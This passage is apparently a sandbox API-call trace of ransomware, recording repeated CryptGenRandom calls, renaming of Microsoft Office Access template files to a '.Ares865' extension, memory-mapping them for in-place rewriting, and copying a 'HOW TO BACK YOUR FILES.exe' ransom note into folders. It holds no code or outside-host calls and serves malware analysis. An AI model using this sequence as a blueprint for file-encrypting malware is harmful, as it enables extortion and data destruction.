RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0064.651] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0064.651] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0064.652] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.652] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.652] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb620, lpName=0x0) returned 0x118 [0064.656] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb620) returned 0x1a0000 [0064.659] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0064.660] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.660] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.660] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0064.661] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Users.accdt.Ares865") returned 80 [0064.661] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Users.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\users.accdt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Users.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\users.accdt.ares865"), dwFlags=0x1) returned 1 [0064.662] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Users.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\users.accdt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0064.662] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=35768) returned 1 [0064.662] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0064.662] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0064.662] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0064.662] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0064.663] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.663] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.663] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8ec0, lpName=0x0) returned 0x118 [0064.664] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8ec0) returned 0x1a0000 [0064.666] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0064.667] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.667] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.667] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0064.668] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType") returned="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType" [0064.668] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType" | out: lpString1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType") returned="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType" [0064.668] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0064.668] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\datatype\\how to back your files.exe"), bFailIfExists=1) returned 1 [0064.673] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.673] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14f30ad0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x580c56a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x580c56a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0064.673] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0064.673] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0064.673] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\Address.accft.Ares865") returned 86 [0064.673] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\Address.accft" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\datatype\\address.accft"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\Address.accft.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\datatype\\address.accft.ares865"), dwFlags=0x1) returned 1 [0064.674] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\Address.accft.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\datatype\\address.accft.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0064.674] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=4417) returned 1 [0064.674] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0064.674] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0064.674] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0064.674] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0064.675] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.675] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.675] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1450, lpName=0x0) returned 0x118 [0064.676] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1450) returned 0x1a0000 [0064.677] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0064.678] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.678] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.678] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0064.679] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\Category.accft.Ares865") returned 87 [0064.679] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\Category.accft" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\datatype\\category.accft"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\Category.accft.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\datatype\\category.accft.ares865"), dwFlags=0x1) returned 1 [0064.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\Category.accft.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\datatype\\category.accft.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0064.680] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=4364) returned 1 [0064.680] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0064.680] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0064.680] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0064.680] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0064.681] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.681] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.681] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1410, lpName=0x0) returned 0x118 [0064.682] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1410) returned 0x1a0000 [0064.683] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0064.684] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.684] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.684] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0064.685] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\Name.accft.Ares865") returned 83 [0064.685] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\Name.accft" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\datatype\\name.accft"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\Name.accft.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\datatype\\name.accft.ares865"), dwFlags=0x1) returned 1 [0064.686] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\Name.accft.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\datatype\\name.accft.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0064.686] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=4404) returned 1 [0064.686] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0064.686] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0064.686] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0064.686] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0064.687] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.687] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.688] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1440, lpName=0x0) returned 0x118 [0064.689] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1440) returned 0x1a0000 [0064.690] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0064.690] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.690] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.691] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0064.691] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\Payment Type.accft.Ares865") returned 91 [0064.691] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\Payment Type.accft" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\datatype\\payment type.accft"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\Payment Type.accft.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\datatype\\payment type.accft.ares865"), dwFlags=0x1) returned 1 [0064.692] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\Payment Type.accft.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\datatype\\payment type.accft.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0064.692] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=4361) returned 1 [0064.692] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0064.692] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0064.692] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0064.692] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0064.693] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.693] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.693] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1410, lpName=0x0) returned 0x118 [0064.694] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1410) returned 0x1a0000 [0064.695] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0064.696] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.696] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.696] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0064.696] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\Phone.accft.Ares865") returned 84 [0064.696] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\Phone.accft" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\datatype\\phone.accft"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\Phone.accft.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\datatype\\phone.accft.ares865"), dwFlags=0x1) returned 1 [0064.699] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\Phone.accft.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\datatype\\phone.accft.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0064.699] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=4306) returned 1 [0064.699] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0064.700] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0064.700] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0064.700] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0064.700] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.700] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.701] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13e0, lpName=0x0) returned 0x118 [0064.702] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13e0) returned 0x1a0000 [0064.703] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0064.703] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.703] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.704] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0064.704] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\Priority.accft.Ares865") returned 87 [0064.704] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\Priority.accft" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\datatype\\priority.accft"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\Priority.accft.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\datatype\\priority.accft.ares865"), dwFlags=0x1) returned 1 [0064.705] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\Priority.accft.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\datatype\\priority.accft.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0064.705] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=4397) returned 1 [0064.705] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0064.705] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0064.705] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0064.705] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0064.706] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.706] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.706] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1430, lpName=0x0) returned 0x118 [0064.707] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1430) returned 0x1a0000 [0064.716] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0064.717] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.717] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.717] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0064.718] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\Start End Dates.accft.Ares865") returned 94 [0064.718] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\Start End Dates.accft" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\datatype\\start end dates.accft"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\Start End Dates.accft.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\datatype\\start end dates.accft.ares865"), dwFlags=0x1) returned 1 [0064.718] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\Start End Dates.accft.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\datatype\\start end dates.accft.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0064.718] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=4194) returned 1 [0064.718] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0064.719] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0064.719] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0064.719] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0064.719] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.719] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.720] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1370, lpName=0x0) returned 0x118 [0064.722] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1370) returned 0x1a0000 [0064.723] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0064.724] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.724] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.724] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0064.725] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\Status.accft.Ares865") returned 85 [0064.725] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\Status.accft" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\datatype\\status.accft"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\Status.accft.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\datatype\\status.accft.ares865"), dwFlags=0x1) returned 1 [0064.725] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\Status.accft.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\datatype\\status.accft.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0064.725] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=4405) returned 1 [0064.725] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0064.726] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0064.726] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0064.726] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0064.726] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.726] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.727] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1440, lpName=0x0) returned 0x118 [0064.728] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, 